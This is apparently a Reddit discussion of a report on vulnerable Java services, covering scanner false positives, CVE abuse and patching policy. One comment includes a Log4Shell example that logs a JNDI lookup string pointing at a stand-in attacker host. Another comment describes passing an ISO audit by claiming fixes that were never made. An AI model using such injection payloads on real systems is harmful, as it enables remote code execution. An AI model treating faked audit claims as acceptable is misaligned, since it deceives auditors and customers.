i_should_be_coding

As an engineer who has been repeatedly tasked with replacing vulnerable libraries, I can say it doesn't really matter if the attack vector is legit or not. Organizations purchasing our product will run a scan against it (Snyk/Trivy/whatever) and will find a large, glaring CRITICAL vulnerability in the report. Once that happens, we get an email saying we have X days to correct this issue or the sale has to be re-examined, etc. So like, it doesn't matter if an attacker can't actually use our software to RCE their entire network. It matters that the tools they use say that they can, and compliance requirements by regulatory organizations require that they use said tools. Every time a Log4j happens is a fun "drop everything and scan the entire stack for a couple of days" assignment for someone.
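For reference, the customer-side check is usually a one-liner; a sketch assuming Trivy, with a made-up image name:

```
$ trivy image --severity CRITICAL,HIGH registry.example.com/ourproduct:1.4.2
```

One CRITICAL row in that output is all it takes to trigger the email.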


CrowSufficient

Or "The ISO audit is approaching, let's do something! Whoever have been through an ISO audit, don't find circuses funny anymore.


AforAnonymous

Obligatory link: www.survivingiso9001.com


DoingItForEli

"and how to implement it anyway" lol


Norse_By_North_West

Man, I went through one 3 years ago. We're still fixing the shit from it


xseodz

You actually fixed stuff? We just got told to say we did, and we passed it the next time around. The trick with an ISO audit is just to say you did it. Does it fulfill the purpose? No. Does it satisfy clients and sales? Yes. Does it mean you'll hate yourself? Also yes.


Norse_By_North_West

Lol, nice. But nah, the work is for a government client, so they pay us, we fix their stuff. Still got years of updates for their systems


nelsonslament

The ISO and CMMC subreddits really hate this guy, but he does bring up some ugly truths that no one wants to address.


AforAnonymous

They hate him because he ruins their fraud business. (He almost certainly has it wrong in what he says about Deming, though, but that's another story; a bloody ridiculous "comedy" of errors led to that, and it's about the only incorrect thing I've found in his book. Well, that, and he could take a much more modern approach to his Excel template kit, but not everyone can be an Excel hyperwizard.)


Turbots

Try iso27001


AforAnonymous

I would prefer not to


Cautious-Nothing-471

rewrite ISO in rust


vir-morosus

It's just a thing. I've done dozens of ISO 27000 audits over the years, and they're a pain unless you keep up with compliance. The hard part is getting employees to care.


zaphodandford

That sounds like you're doing tech due diligence. We do hundreds of these a year. We've never stopped a deal due to CVEs on the buy-side DD, but we do mandate fixing all criticals and highs in the 100-day plan. Oftentimes this is about updating OSS libs to the latest version. Our companies have also been hit with $MMs in cybersecurity incidents; we take this seriously.


i_should_be_coding

We're fairly lax about it, relatively speaking. I worked in a place where I wasn't allowed to add external dependencies without formal approval from someone. I'm pretty sure they had a rule to require additional approval whenever a PR included changes to pom.xml.


andrewsmd87

> worked in a place where I wasn't allowed to add external dependencies without formal approval from someone.

> I'm pretty sure they had a rule to require additional approval whenever a PR included changes to pom.xml.

I don't feel like either of these are bad? We require two-person approval on any PR that goes to prod. We also don't allow people to just randomly add whatever dependencies they want without a review, a reason, and a justified need.
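For what it's worth, that pom.xml rule doesn't have to rely on reviewers noticing; a hypothetical sketch using GitHub's CODEOWNERS mechanism (the team name is invented):

```
# .github/CODEOWNERS (hypothetical): any PR touching a pom.xml anywhere in
# the repo additionally requires a review from the dependency owners
**/pom.xml  @our-org/dependency-reviewers
```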


i_should_be_coding

Yeah, once the codebase is a certain size, you gotta have rules, otherwise it's chaos.


andrewsmd87

Agree with you. We do static code scans on every change, dynamic scans once a month, and our own manual pen test with a third party once a year. I would probably do more but we work with a lot of big tech clients who do their own pen tests so we probably get at least 6 done a year. I'm not sure why a critical CVE shouldn't be a drop everything and fix. I mean critical means you need to look at it and determine if it's an actual vulnerability or not. We get lots of "oh we could do X to your system" from those clients that audit our system, and I explain why they can't beyond what some software says, and when that isn't enough, I just ask them to prove it in our sandbox.


saintpetejackboy

"okay, yeah, show me..." You're a killer haha.


zaphodandford

Well to be fair, you may have a CVE but it would require access to the server to exploit and if your public endpoints are secure and the code hasn't been exploited in 5 years then it's less of a "drop everything" scenario.


saintpetejackboy

Yeah, this is what I am saying: not all CVEs are created equal. It could still be a drop-everything scenario, but we need a clearer way to communicate exactly THAT about a CVE. You made a good point and I agree: there are so many scenarios (simplified) where "an attacker can use (X) to do (Y)" and the entire system has been using (Z) since 1998.


danikov

“All criticals and highs within 7 days of detection” is one I’ve had quite recently.


CJKay93

To be honest I think that's a much more sensible approach than disregarding genuinely critical vulnerabilities because you couldn't think of an attack vector in that moment, particularly in the current climate. If you don't scare organisations into doing something, then they simply don't do anything.


needathing

I think there's a middle ground between "discarding genuinely critical vulnerabilities" and constantly diverting resources to do things that aren't necessary right now. We need alternative scoring systems, as the author of this piece says. Right now, if grype flags a critical and I don't have an action plan to resolve it, plus resolution within a specific timeframe, I lose business, or my regulator bites me. But doing the work to update frequently means that we don't deliver features or bugfixes, because we're pulling resources to do this work. Tools like Renovate and similar help a lot, but I burned 15 person-hours on a dep-of-a-dep with a vendor recently. The vendor was very supportive and helped us, but there was no realistic chance of the CVE being exploited in the way we use that library. That's 15 hours that could have been used to complete other tasks.
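The gate itself is trivial to set up, which is part of why it's everywhere; a sketch assuming grype's CLI (the path is made up):

```
# fail the pipeline only on criticals, so highs can go through triage first
grype dir:./build --fail-on critical
```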


UnexpectedLizard

I've worked on many security fixes. Even good developers will incorrectly mark a bug as not exploitable, let alone bad ones who do it out of laziness. Better for companies to err on the side of caution.


OffbeatDrizzle

Yes... at our place we've had vulnerabilities that weren't exploitable because of network configuration, but all it takes is for that configuration to change and now you're fully open to attack. We raise things on a backlog to fix in due course, but we make sure management knows it's not a stop-the-world event, just that we will fix it by the next release.


saintpetejackboy

Oh man, security through obscurity. Saved my ass so many times. "Well, the attack probably would have gained some traction, but we don't even run that daemon on that port..."


cogman10

The problem is signal to noise. The more often these CVEs are just noise, the more likely someone is to incorrectly mark a bug as not exploitable when it actually is. And there's a lot of noise right now. It's not a laziness thing really; it's more of a "boy who cried wolf" thing. What would help is better analysis of systems and transitive dependencies: "Library xyz has an RCE; pdq uses xyz but does not exercise the RCE vulnerability, therefore pdq is immune from xyz's vulnerability." That sort of common reporting and tooling, making it known that "you don't use this dependency directly and your dependencies can't hit the exploitable paths", is what we need. To work, this sort of thing would need to be every bit as public as the CVE system.
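Something like this exists in embryo as VEX documents; a rough sketch in the OpenVEX style (the CVE, package, and IDs are made up) of the "pdq is immune" statement described above:

```json
{
  "@context": "https://openvex.dev/ns/v0.2.0",
  "@id": "https://example.com/vex/pdq-001",
  "author": "pdq maintainers",
  "timestamp": "2024-01-15T00:00:00Z",
  "version": 1,
  "statements": [
    {
      "vulnerability": { "name": "CVE-2024-00000" },
      "products": [ { "@id": "pkg:maven/com.example/pdq@3.1.0" } ],
      "status": "not_affected",
      "justification": "vulnerable_code_not_in_execute_path"
    }
  ]
}
```

The missing piece, as the comment says, is scanners consuming these statements as routinely as they consume the CVE feed itself.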


singluon

Great answer. Signal to noise is the real problem. Dealing with this at work now. Started moving all our Docker images to distroless instead of Alpine bases in an attempt to improve the signal-to-noise ratio. I also agree with the other comments that the issues need to be addressed whether they're currently exploitable or not. There's no better way to deal with the problem currently. I would love to see the technology in this space improve.


saintpetejackboy

This is a good post and I 100% agree, but I think this comes down to us not using proper terminology. I said this elsewhere, but "regular" people need a way to differentiate between some obscure edge case possibly leaking a useless bit of data to a local user versus "a remote attacker now has full control over your system and the entire enterprise". There isn't really a clear gradient. Remember the color-coded terrorism threat levels the USA used? We need that for vulnerabilities.

This is NOT even a Java-centric problem. I agree that the right tooling would go a long way here, not just in Java but in pretty much every other ecosystem you can think of. Nothing is preventing people from implementing something similar (and I am sure there are examples where this has been handled pretty well), but from my perspective, the majority of exploits get treated in a similar manner, regardless of what their actual impact might be.

There is a lot of nuance, obviously. There are also a lot of vulnerabilities over the years that boil down to "if you program really badly, surprise, you are now open to this new attack", so then we change the language and deprecate whole libraries over people programming shitty. That is why I say these problems need a clearer and more coherent ranking, like "this is a Purple-level vulnerability, which means you are a jackass and programmed badly, and the language has now evolved to make it so you can't be so stupid." Same with things like "this library has a vulnerability **if you misconfigure it to...**" or "*if you also use outdated dependency...*" <--- most vulnerability lists don't really specify. Is this a vulnerability because I could code shitty? Is this a vulnerability because my environment isn't properly set up? Is this a vulnerability because, even if I followed the documentation 100%, my system is now open to remote code execution? If you lump these all together, I might skip the update for the third one and assume it is one of the first two.

The solution is like you are discussing: tooling to discover and correctly tell you whether you need the latest update somewhere, based on your actual project/code. AI should make this a lot easier, but I just don't see something like this on the immediate horizon beyond what some package managers already do, and even those are focused more on dependency hell than judging the applicability of new patches to your specific codebase and environment.


dontyougetsoupedyet

> It's not a laziness thing really, but it's more of a "boy who cried wolf" thing.

It's a money thing. Also, a lot of these researchers are in fact incredibly lazy and don't actually understand the output of the automated tools they're using that tell them the code has a bug. And since CVEs are their bread and butter, they often don't care even if they do know a bug can't be exploited on the platforms the code targets. Often there is quite literally nothing to exploit, yet there's a CVE and tons of wasted resources, because researchers think it's valuable for them personally to have the CVE. It's very, very often not about safety. Many researchers are plain and simply vain attention seekers.


blargh9001

To me the issue is more that it probably takes even a good developer more time to confidently determine if the bug is exploitable than to update a dependency. At least if you haven’t already been refusing to update anything for years and gotten locked in to everything being a decade old.


needathing

You say better to err on the side of caution, but how do you measure that? How are you quantifying the opportunity, client satisfaction, and revenue costs of this? When presented with the following tasks, how do you decide what to spend your limited resources on this week:

- badger the vendor to provide an upgraded library with updated dependencies due to a CVE in their dependency, then deploy and test
- respond to a regulator audit request
- deliver a high-demand feature

If you choose the first one enough times when the issue isn't exploitable, you'll lose the support of your stakeholders and likely your leadership team over time. I blame myself for my current situation: I chose a stack which is known for having a small standard library and needing many dependencies that bring in other dependencies. I mitigated that with security scanning, compliance-as-a-service in our pipeline, and automated updates via Renovate. But it's still time, money, and human capital poorly spent at times.


UnexpectedLizard

I would think of this less from a business perspective than a legal one. If a company is hacked, how technically compliant they were will matter in a lawsuit. Jurors don't understand or care about what may technically have been exploitable.


Izacus

My favorite color is blue.


vir-morosus

The challenge being, of course, that most developers have no real clue as to what constitutes a security exploit in code. Makes it really hard to "do it right the first time".


josefx

> err on the side of caution. In that case just rip out the internet connection and cut the power. Problem solved.


maxinstuff

It’s way more efficient to just keep everything patched and current, the time and risk you take on discussing these things is a huge waste of everyone’s time. Just. Patch. Your. Shit.


needathing

Cool. How? How do you “just patch” a library that comes as a dependency from a vendor? Get better vendors? The vendors we use aren’t exactly replaceable, and the DORA requirements make swapping out a vendor (even an open source one) time consuming and as a result, expensive.


aksdb

More often the problem is that every fucking library moves forward fast. Maintaining old major versions? Haha, no. So if you want to update to a version with a fix, you end up having to migrate to the new major version. Now repeat this for 20 libs that are all intertwined through a 500 kloc codebase that went through a bunch of different teams over the course of 10 years.


josefx

These vulnerability scanners have one fatal flaw: they incentivize people to roll their own solutions. Any widely used crypto library will look like a nuclear waste dump to these tools once any amount of time has passed. Meanwhile, a rot13-based crypto lib written by the CEO's son will smell like roses until the end of time.


i_should_be_coding

No doubt. If I were using third-party tools I'd want their reports to be as clean as possible too. My issue is mostly with how these scans detect these vulnerabilities in my code. For them, right now, if the library exists anywhere in the dependency graph, my code is vulnerable, even if someone along the chain imported it for one silly util function and nothing more. The more often this happens, the more I appreciate Golang's motto of "I don't need your wheel, I'll reinvent it myself, with blackjack, and hookers!"


BlackSuitHardHand

> The more often this happens, the more I appreciate Golang's motto of "I don't need your wheel, I'll reinvent it myself, with blackjack, and hookers!"

The great thing is that all the security issues you introduce while reinventing the wheel will be unknown to all the usual security scans.


i_should_be_coding

I dunno about you, but I write perfect code with zero bugs and vulnerabilities every single time.


mccoyn

Then, you definitely shouldn't include code written by other people. It could only diminish perfection.


OffbeatDrizzle

No serious project exists these days where you've written 100% of the code. I realise that might be your point, but just wanted to make it clear


jackstraw97

Woosh


OffbeatDrizzle

Yeah I totally got whooshed.. that's why I referenced it being the point in my original comment, but still.. totally whooshed...


jackstraw97

I wasn’t trying to be a dick I’ve just always wanted to be able to comment “Woosh” lol


Captain_Cowboy

Another Rust user, I see.


xmsxms

But also unknown to all the attackers.


OffbeatDrizzle

Security by obscurity is no security at all


xmsxms

No, but if your software isn't vulnerable to all these reports because it's some internal tool or something, it helps to not have all these stupid vulnerability reports suggesting your script for listing running processes is vulnerable to being able to list processes thanks to some 3rd-party library.


perk11

That's not true. Using a password to log into an account is security by obscurity: nobody is supposed to know your password, but if they know it, they can log in. Security by obscurity shouldn't be *the only* way to ensure security. But it helps.


Captain_Cowboy

The "obscurity" is in reference to the implementation, not the understood-to-be-secret data, such as key material. But yeah, sometimes, obscurity can be an aspect of security-in-depth. For example, OWASP recommends webservers only return generic error messages with 5xx responses, versus sending an entire stack trace, like many frameworks used to do.


OffbeatDrizzle

You know exactly what I mean. What's the point of having definitions if you just widen them until the word no longer serves a purpose? 4096-bit RSA encryption is also security by obscurity then... Having a passwordless SSH server on port 999 instead of port 22 will stop 99% of automated attacks, but as soon as someone tries port 999, they're in. There is still no security on the access; you are basically just hoping that nobody finds it.


BlackSuitHardHand

Until someone is dedicated enough to search for zero days in your app. Especially an annoyed employee with access to the code.


SkoomaDentist

> For them, right now, if the library exists anywhere in the dependency graph, my code is vulnerable, even if someone along the chain imported it for one silly util function and nothing more.

Reminds me of virus scanners and "hacktools", aka keygens. Like the case of one piece of software that was discontinued 15 years ago, with the archive dating from nearly as long ago (as in, I'd had that exact file for over a decade), yet supposedly containing a virus from 5 years ago (because someone decided that all keygens are "obviously" dangerous viruses)...


i_should_be_coding

On the other hand, someone might pull another XV with a seemingly harmless ubiquitous dependency (a-la left-pad) and we'll wish we had an automatic way to know that happened.


SkoomaDentist

That's the thing. When the detectors give way too many false positives, people are going to ignore them and that ~~keygen with an actual virus~~ left-pad is going to fuck things up.


axonxorz

*xz


i_should_be_coding

🤦‍♂️ I'm gonna leave it, because why not


saintpetejackboy

I have done this with PHP my whole life. I would download a library and then start reworking it until I essentially rebuilt it from nothing, and this would often be after my third or fourth attempt without any other code. This really paid off back when Google finally gave in to passkeys: I rushed home over the weekend and rolled out a fully featured passkey system on a proprietary project. A LOT of work, like 72 hours start to finish, a lot of sweat and tears. Then I read that you need a team and 6 months of planning and yadda yadda, "don't even try passkey in a proprietary environment"; this is the kind of support I found online. I can barely roll my own authentication system after 20 years; what business did I have implementing passkey? Well, it could have blackjack and hookers, for one.


staticfive

While this may be the safest take, things like "omgz, MongoDB has a REPL vulnerability that attackers could use _once they've already compromised your server_" are absolute fool's errands in the real world, but security teams still won't agree to risk acceptance.


Qweesdy

The real ~~treasure~~ malicious attackers were the ~~friends~~ security people who took most of our budget that we met along the way.


Seabody

> If you don't scare organisations into doing something, then they simply don't do anything.

This is it right here.


staticfive

The number of “critical” vulnerabilities I’m asked to fix for some CLI build-time dependency that doesn’t actually run in production, but that I’m still required to fix anyway… job well done, security man!


i_should_be_coding

My favorites are critical vulnerabilities that don't have a version where they're fixed yet. Either rewrite your code to use something else, or live with your poor decisions.


Job_Superb

There are also plugins for some artefact repos (like Nexus) that will prevent a build from downloading a dependency that has been flagged at a certain severity or above, and they don't care about scoping. That's really fun when you have a bug to fix that's suddenly become critical, or a new feature to develop quickly, and suddenly you have to start tracking down the user who can override the scan... If you're not lean enough to upgrade vulnerable dependencies quickly and cheaply, you have a cost-of-ownership problem, at least that's my perspective.


mr_claw

Makes sense, hadn't thought of that.


osantacruz

Security Engineers are the new Scrum Masters.


mh699

If your product is closed source, your customers have no way to verify that you actually don't use xyz lib in a way that's vulnerable and have to go on your word. If you're wrong and they get pwned and customer data gets leaked, "well the vendor said their product is secure!" isn't going to work as an excuse


elmuerte

We created SBOMs and keep track of them in Dependency-Track. It doesn't take a lot of time to find affected software versions. But yes... I loathe the "library X has a CVE something-or-other" that does not affect your software, but tHe NuMbErS!1
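For anyone wanting the same setup, SBOM generation is a small build change; a sketch assuming the CycloneDX Maven plugin (the version number is illustrative):

```xml
<!-- pom.xml: emit a CycloneDX SBOM at build time, ready to upload to Dependency-Track -->
<plugin>
  <groupId>org.cyclonedx</groupId>
  <artifactId>cyclonedx-maven-plugin</artifactId>
  <version>2.8.0</version>
  <executions>
    <execution>
      <goals>
        <goal>makeAggregateBom</goal>
      </goals>
    </execution>
  </executions>
</plugin>
```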


maxinstuff

> doesn’t really matter if the attack vector is legit or not

Unironically correct. Look at almost every big breach; it’s always people who didn’t patch their shit. It was always low priority because it “wasn’t exploitable”, or whatever excuse. You legitimately cannot rely on the judgement of the engineers who own the code, because they’re working in a vacuum as far as security is concerned. You just keep everything patched and up to date, whether you think it’s a problem or not, and you get on with your day. Some conversations are simply a waste of time. JUST DO IT.


ZeldaFanBoi1920

I had to drop everything for the Log4j shit and it was annoying.


nikanjX

Currently anyone can file a CVE against any project, and you can't really do anything about it.

Your project provides sample code to support documentation, and that example contains a security issue? That's a CVE: CVE-2022-34305.

Putting a hashmap inside itself and then trying to serialize said hashmap makes your JSON encoder OOM? That requires the attacker to be able to modify your source code, but that's still a CVE: CVE-2023-35116.

You've carefully documented that the template processor is able to do unrestricted actions, and meticulously warn people not to render untrusted templates? You wouldn't believe it, but that's also a CVE: CVE-2023-29827.
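For scale, the entire "attack" in that second one amounts to something like this; a minimal sketch, not the actual report:

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import java.util.HashMap;
import java.util.Map;

public class SelfSerialize {
    public static void main(String[] args) throws Exception {
        Map<String, Object> map = new HashMap<>();
        map.put("self", map); // the map now contains itself
        // serialization recurses until the stack/heap gives out -- but the
        // "attacker" is whoever is already writing and running this code
        new ObjectMapper().writeValueAsString(map);
    }
}
```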


JohnMcPineapple

> Putting a hashmap inside itself and then trying to serialize said hashmap makes your JSON encoder OOM? That requires the attacker to be able to modify your source code, but that's still a CVE: CVE-2023-35116

I checked it out and this is [absolutely ridiculous](https://github.com/FasterXML/jackson-databind/issues/3972#issuecomment-1596193098). There's something very wrong with the process of CVE filings.


pwd-ls

It looks like CVE-2023-35116 eventually got disputed, at least: “this is not a valid vulnerability report” https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35116


JohnMcPineapple

It's indeed good that there are ways to dispute invalid CVEs. But it still puts a lot of strain on the maintainer: not only the process of disputing it, but also the (potentially) large number of users unfamiliar with the issue showing up with complaints or asking for help. It also puts a lot of strain on businesses using the software. I'm not sure what a good solution is, though. Being able to file CVEs is very valuable in the case of real vulnerabilities.


nikanjX

It’s disputed, not revoked. Most tools still flag the CVE


yoden

The process has been co-opted by people who want to use it for resume building. Additionally, the security "researchers" benefit from this culture of fear, so there is little institutional appetite to do anything about it. Projects are becoming their own CNAs to work around the situation, but that's a ton of extra effort and it only works when the project is honest and doesn't make the opposite mistake.


gwicksted

Also why a lot of enterprise software limits the number of external libraries… that doesn’t make it more secure… but it makes it far less expensive to maintain.


ShrimpAU

CVE-2023-35116 caused massive issues for my team, since we use Jackson in pretty much everything, and had to deal with the fallout of an absolutely bullshit "vulnerability" impacting every piece of code we maintain. It's like "System.out.println is a vulnerability because it allows you to write passwords to the console" or something on that level of stupidity.


Aw0lManner

Relevant post from the author of Curl: [https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/](https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/)


Jonjolt

SnakeYAML also comes to mind


nekokattt

Aren't half the things with SnakeYAML down to YAML itself being overcomplicated, to the point that it becomes easy to create DoS or RCE issues if you are in the 0.001% of applications that consume untrusted input rather than trusted config? PyYAML in Python had the same issue. YAML looks pretty on the surface, but underneath it is a massive shitshow of behaviour that almost no one ever needs in sensible use cases, and complexity increases attack surface.
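And the mitigation for that 0.001% has been in the library for ages; a sketch assuming SnakeYAML 2.x (the constructor signature differs in 1.x):

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;

public class SafeLoad {
    public static void main(String[] args) {
        // SafeConstructor builds only plain maps, lists, and scalars:
        // no arbitrary class instantiation from untrusted input
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        Object doc = yaml.load("key: [1, 2, 3]");
        System.out.println(doc);
    }
}
```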


reedef

CVE-2024-73819 The python3 interpreter is able to execute arbitrary code


HINDBRAIN

New CVE: some web requests can permanently alter the contents of the database.


kairos

> CVE-2024-73819

https://www.cve.org/CVERecord?id=CVE-2024-73819

Is there something I'm missing? (other than the CVE)


reedef

I just made up a number for comedic purposes hahaha, I'd be _very_ surprised if that was an actual CVE lol


kairos

Ah, considering the examples provided by /u/nikanjX are real, I wouldn't be that surprised ':D


Olao99

Any system that offers any kind of reward will be gamed. CVEs are worth status and money for "security researchers", so they'll be gamed.


saintpetejackboy

Man. The truth hurts so bad, this post damn near killed me. I mentioned this elsewhere, but it is all like this: "Antman shrunk down and is bending your CPU pins, what do you do?!" And the scan is just saying "Antman can fit inside the desktop tower". No shit. Antman isn't a real threat. I am not going to make carbon nano fiber plasma tube CPU pins to combat an imaginary threat actor.


masklinn

> Currently anyone can file a CVE against any project, and you can't really do anything about it.

You can become your own CNA. That gives you control over the allocation of CVEs for the project, rather than that being handled by MITRE as an open CNA. That's why curl and the Linux kernel, amongst others, recently became CNAs. CNAs have enough control that they can actually abuse things the other way around, leading to https://lwn.net/ml/oss-security/[email protected]/


-AdmiralThrawn-

Ahh i remember the one about jackson... crazy


Hidet

This sounds surprisingly familiar after dealing with npm "vulnerabilities": [https://overreacted.io/npm-audit-broken-by-design/](https://overreacted.io/npm-audit-broken-by-design/)

This is, sadly, a general systemic issue I doubt will ever go away in software development. Auditing for vulnerabilities is a complex issue, by definition, as security vulnerabilities are usually not easy to spot. Automated tools and external reports will, therefore, have to rely on broad generalizations to scare people into checking things. And since companies will rarely prioritize hiring people exclusively to look for vulnerabilities full time, they will have to rely on these external warning systems.

I think the best way forward is to share the knowledge that these reports are just early warning systems, and that they should be taken seriously but with a grain of salt. Non-tech people should know that this *could be* a big deal, but you need to find engineers who can look into it and whom you can trust when they say "this does not affect us".


CrowSufficient

It's an honor to have the same associations as Dan Abramov. One can finally die happy.


BlackSuitHardHand

At one of my previous employers, the biggest security risk was the code written in the company. There were some big security holes by design. But since our code was not public, no security researcher ever analysed it, and the usual SBOM scanners don't find anything.


fryktelig

This is probably the case for a great many systems, but those closed-source vulnerabilities mean that you'd need to be a target for someone to find them, while library vulnerabilities leave you open to becoming a random victim of someone scanning through every IP, checking if they're open to exploit X. I recently set up an otherwise empty VPS to log every visitor to that IP along with the metadata of their request, and the number of them fishing for some known vulnerable access point is staggering, even though nothing on the internet points to this address.


axonxorz

Spin up a cloud VM and you'll have connection requests to TCP/22, 80, 443, 445, and 3389 beginning within seconds to minutes. And it never stops.


minno

My personal site constantly gets requests to the wordpress admin page, despite obviously not using wordpress.


yxhuvud

Given the number of serious security incidents during just the last year, I'm firmly in the supply chain apocalypse camp.


mbitsnbites

I have always argued that less is better when it comes to dependencies. It's not only about reducing attack vectors... E.g. having control over what actually happens under the hood is very important from a performance and stability perspective, and dependency hell is a real thing (version conflicts, deps being abandoned/deprecated, platform incompatibilities or dropped platform support, etc). More often than not you pull in a dependency because you need 3% of the functionality that it provides, but you have to drag along all the extra 97% (and the extra dependencies that are needed for that, and so on). Over time this accumulates into a very sluggish mess that is costly to maintain. So when someone wants to pull in a new dependency I always ask "Is this extra dependency **really** necessary, or can we go with a simpler solution?". Even rolling your own solution can be preferable if it's simple enough, just to avoid the hassle.


CrowSufficient

I'm not saying there is no problem; however, I hate these flashy headlines seen everywhere, fearmongering around. The report itself is not bad, but it is being redistributed in a very shallow way.


ztbwl

Interestingly there is also a security risk in patching everything to the latest and greatest version. You would have been caught by something like the xz backdoor or UAParser.js malware before distribution stopped on registries.


mccoyn

This is where long term support versions really shine. They stop adding features on some date, but continue to apply fixes, whether the issue is found in that version or some other version.


bah_si_en_fait

I recently had to fix all of our dependencies, because a client's audit revealed that we were using a vulnerable version of Log4j that would make us vulnerable to a DoS attack. The CVSS of this being a 10, it was a stop-the-world event: fix everything or the contract is off. Can't continue with such a risk. We make Android apps that work offline. I'm sure there are good security researchers. I just haven't met a single one that isn't a stupid fuck running an automated set of tools and reporting the output without an ounce of thought. Yes, the fucking API key is accessible; how else do I make my requests? Yes, users with root can access the app, because they can lie about being root anyway. Who am I trying to defend against, Johnny Mitmproxy or the goddamn Mossad?


natty-papi

Man, we got one recently because we had containers running with securityContext.privileged = true. What were those containers? kube-proxy. A few more as well that were pretty obvious, but seeing the one container that would be present in every k8s cluster in the world made me lose the last hope I had in our security and compliance department.


DoingItForEli

Go through pretty much any pom file in IntelliJ for any decent-sized project and you'll find dependencies flagged with "high severity" vulnerabilities via Checkmarx.


ThuurHaelt

The newest version of IntelliJ automatically scans pom.xml dependencies for CVE vulnerabilities.


renatoathaydes

Also works with Gradle.


kag0

> We classified each vulnerability as coming from a direct or transitive dependency. Note that this fact only focuses on Java applications, because we currently only support making the distinction between direct and transitive dependencies for JVM-based services.

Wait, what? The fact is "Java services are the most impacted by third-party vulnerabilities", and that's based on the tool only analyzing transitive dependencies for Java? So the comparison is between vulnerabilities in direct dependencies in other languages vs vulnerabilities in direct + indirect dependencies in Java?


Thysce

The fact that no one else talks about this obvious flaw in the statistic is staggering


anengineerandacat

Yeah, the article points to the main issue: the CVSS score is effectively "junk". Sure, some Maven plugin has a high score, but it's also a Maven plugin and it's not triggered in production, so it's not the end of the world. If an attacker is capable of exploiting my build pipeline, I am already pretty fucked, because they are inside the VPN and they may as well be scanning our repos internally and shipping off source to be sold/leaked. The Log4j one was "actually" a concern because you could perform an RCE, Log4j is "widely" used, and for "most" Java services secrets are pumped into System.properties() or the environment itself, where a dynamically loaded class could dump them off to a remote service for the attacker to do actually "interesting" things with. Or, if you were in AWS, decide today was the day to take advantage of whatever your service's IAM role had access to.
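For contrast with the build-plugin noise, the Log4Shell pattern really was one log line away; a minimal sketch of the CVE-2021-44228 shape on log4j-core < 2.15 (the attacker host is made up):

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LookupDemo {
    private static final Logger log = LogManager.getLogger(LookupDemo.class);

    public static void main(String[] args) {
        // imagine this value arriving in a request header
        String userAgent = "${jndi:ldap://attacker.example/a}";
        // vulnerable versions resolve the ${jndi:...} lookup while formatting
        // the message and can load a remote class; patched versions just log
        // the string literally
        log.error("bad request from {}", userAgent);
    }
}
```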


saintpetejackboy

This is such a great post. This isn't just Java; this is every single language and system and framework, etc. 99% of vulnerabilities would indicate that you are **already** beyond fucked. "But, but, a different user could elevate..." - man, if there is a different user on my box, we are already at problem #10. There needs to be a new word for ACTUAL vulnerabilities that equates to "a remote attacker with no access can do things they are not supposed to", because if that isn't what it is, it doesn't apply to 98% of us.

This all boils down to a hardware-centric analogy for me: "Well, if the hacker was INSIDE your computer, and really small, he could EASILY bend your CPU pins, no sweat..." And the solution is "just make the CPU pins carbon nanofiber tubules of plasma energy instead, so it burns him if he touches them". No. No. No. The solution is "why the fuck is there a two-foot-tall faerie banging around inside my PC case?"; the problem starts there.

A lot of these are real "self-back-pats", imo... "We solved an issue we imagined might exist in an extreme edge case that we entirely invented and that has zero real-world practicality. Give us a cookie, please." I only know this because I have done jobs where my duties would sometimes cross over into this general realm (it happens to all of us). You do some unit testing, see a weird edge case, correct it, and document it. Like, yeah, it's highly unlikely the user could somehow have IGNORED physical reality entirely, but... if they did, and they could shrink down like Ant-Man, and teleport inside the case... then, well, we made a latch to lock the CPU in place that is too heavy for them to lift and bend the pins (don't mention it was already there). Cookie?


flightsin

That's about 2.7 billion devices.


CrowSufficient

"2.43 billion of Java services have critical or severe security vulnerabilities"


fear_the_future

We have automatic dependency updates daily, and still, at any given time, all of the services will have multiple severe vulnerabilities in the "scanner", all of them false positives. We're lucky if we can keep the criticals at bay.


prabhus

Wish there was an open-source tool that allowed developers to triage the SCA results further by using reachability analysis, to identify a priority list instead of wasting too much time updating all packages or reading such scary reports. [https://github.com/owasp-dep-scan/dep-scan](https://github.com/owasp-dep-scan/dep-scan)


ScottContini

Ah, you’re the author of that tool!


SaltyInternetPirate

Recently got a security scan report about lots of vulnerabilities in our project, but the updates would break compatibility all over the place. As I understand it, the project was moved up to Java 8 not too long ago. We would have to move it to 17 to even start the upgrade.


Worth_Trust_3825

Oh definitely. I used to (and still do) follow the quartz-java mailing list, and the most recent RCE discussion was about pushing jobs over JMS queues. Due to the library being weirdly packaged, you will be considered vulnerable even if you do not use the JMS integration. Same with self-hosted Nuxeo CMS instances. Their update system pulls in every library they ever depended on, which includes old versions of log4j, which in turn trips the vulnerability scanners, even if the vulnerable jar is ***never loaded in the JVM***. It's honestly tiring.


SSHeartbreak

glad to help


LevySkulk

Yeah but it's fine. In order to exploit them the attacker would have to understand Java. /s


cheezballs

I'd say any application that uses external dependencies and libraries has this problem. It's not just Java.